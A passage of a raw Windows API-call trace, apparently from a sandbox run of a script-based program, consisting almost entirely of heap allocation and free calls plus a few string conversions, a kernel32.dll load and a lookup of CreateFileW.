lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0088.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0088.462] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.462] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0088.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0088.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c68 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0088.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0088.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0088.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0088.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0088.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.464] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0088.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0088.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0088.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0088.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0088.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0088.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0088.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0088.468] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0088.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.470] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0088.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0088.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, 